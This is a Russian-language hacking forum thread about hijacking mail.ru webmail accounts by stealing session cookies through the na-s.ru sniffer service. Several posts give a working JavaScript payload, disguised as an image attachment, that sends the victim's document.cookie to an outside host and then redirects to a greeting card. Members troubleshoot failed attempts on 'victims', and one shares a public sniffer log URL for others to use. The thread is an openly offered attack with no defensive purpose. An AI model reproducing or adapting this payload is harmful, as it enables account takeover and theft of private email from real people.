Взлом mail.ru с помощью сервиса na-s.ru

Статус
В этой теме нельзя размещать новые ответы.

Kabal

★★★ Адвокат ★★★
Пользователь
Активный участник
Проверенный
Сообщения
317
Реакции
194
Баллы
63
Credits
-24
Видео по взлому мыла на mail.ru
( тянем куки с помощью na-s.ru)

СКАЧАТЬ 8.2 мб
 
Последнее редактирование:
Причин того что у тебя не сработало может быть много, ну к примеру :

1. жерва может пользоватся почтовым клиентом, а не веб интерфейсом;
2. Могут быть отключены ява скрипт;
3. Жертва может сначала сохранить картинкуи потом просмотреть, а нужно что бы она была запущена из браузера;
4. имеются проблемы с открытием на Лисе;
5. Утащенные Сессии хранятся не больше 15 минут;
6. Ты делаешь что то не так.

Прежде чем тренироватся на жертве, протестируй.

Попробуй вот этот код

Код:
<script>img = new Image(); img.src = "http://na-s.ru/images/******_1.gif?"+document.cookie; // здесь ваш код для кражи кукис
// редирект через 3 сек.
var URL = "http://images.cards.mail.ru/11bolprivet.jpg" // адрес открытки, если хотите, можете изменить на свой =)
var speed = 3000
function reload() {
document.location = URL
}
setTimeout("reload()", speed);
</script>

Сохраняешь его 1.img
Потом отсылаете в аттаче.
 
Последнее редактирование:
Тестил сегодня, что-то не получается... Создал левое мыло на майле.

Причин того что у тебя не сработало может быть много, ну к примеру :

1. жерва может пользоватся почтовым клиентом, а не веб интерфейсом;
2. Могут быть отключены ява скрипт;
3. Жертва может сначала сохранить картинкуи потом просмотреть, а нужно что бы она была запущена из браузера;
4. имеются проблемы с открытием на Лисе;
5. Утащенные Сессии хранятся не больше 15 минут;
6. Ты делаешь что то не так.

Послал. Открывал через опреу, скрипты включены, смотрел открытку в браузере, логи не появились... Где ещё может быть проблема?
 
ХЗ.. только что проверил. Все нормально, логи приходят. А ты код под себя настраивал? вот в этой строке?
img.src = "http://na-s.ru/images/******_1.gif?"+document.cookie;
или просто скопировал и отправил? Вместо звездочек должен быть Логин под каким ты зарегился на сервисе na-s.ru
 
Kabal, на счет моих ошибок, я уверен что я был оккуратно!
Причин того что у тебя не сработало может быть много, ну к примеру :
1. жерва может пользоватся почтовым клиентом, а не веб интерфейсом;
2. Могут быть отключены ява скрипт;
3. Жертва может сначала сохранить картинкуи потом просмотреть, а нужно что бы она была запущена из браузера;
4. имеются проблемы с открытием на Лисе;
5. Утащенные Сессии хранятся не больше 15 минут;
6. Ты делаешь что то не так.

1. Жертва не пользовался почтовым клиентом!
2. Нет, потому что не шарует!
3. Нет, он сразу запустил из браузера!
4. Да, вот это может быт. Потому что он пользовался ФФ!
5. Дело тоже не в этом!
6. Все я делаю правильно.
На код я cделал так - img.src = "http://na-s.ru/images/diploboy_1.gif?"+document.cookie;:kngt:
 
Последнее редактирование:
На код я cделал так - img.src = "http://na-s.ru/images/diploboy_1.gif?"+document.cookie;:kngt:
Если ты на сервисе na-s.ru зарегистрировался под логином diploboy, то все верно .... вот привожу полностью код который можешь копировать в блокнотик , затем сохранишь с расширением img и отправляешь ... вобщем пробуй.
Код:
<script>img = new Image(); img.src = "http://na-s.ru/images/diploboy_1.gif?"+document.cookie; 
var URL = "http://images.cards.mail.ru/11bolprivet.jpg" 
var speed = 3000
function reload() {
document.location = URL
}
setTimeout("reload()", speed);
</script>
 
Да, я именно так и сделал. Но, не получился. Ладно, уже не интересно. Спасибо
 
Здравствуйте! na-s.ru уже закрылся как я поняла, так? Но выложен их скрипт, кто нибудь тестил? Если нет может потестим вместе?
P.S. Вещь то нужная)))))
 
Здравствуйте! na-s.ru уже закрылся как я поняла, так? Но выложен их скрипт, кто нибудь тестил? Если нет может потестим вместе?
P.S. Вещь то нужная)))))

это не их скрипт, они свой не дадут на паблик, хотя аналогов полно, гугли php online sniffer
 
нигде так как сервис na-s.ru уже давно закрыт... а вообще кукисы ты будешь видеть именно на сервисе который предоставляет возможности снифера ...(кражи кукисов)
 
а зачем сервис когда этих сниферов полно на php валяется, хостинг+php и погнал

Добавлено через 14 минут
повесил себе на хост, юзайте кому надо http://warlab.org/public/log.php
 
Последнее редактирование:
А где взять программу?

Я смотрела видео и там он какую то черную программу открыл чтоб туда ему что то пришло где вот эту программу черную взять???
 
Я смотрела видео и там он какую то черную программу открыл чтоб туда ему что то пришло где вот эту программу черную взять???

в черной комнате можно взять эту черную программу .....зы)))
 
лучше уже свой снифер поставить...

ну так поставь, а учше рассажи пошагово как ты это сделал. Но это уже будет разговрор для другой темы. А посему настоящую тему закрываю.
 
Статус
В этой теме нельзя размещать новые ответы.
Сверху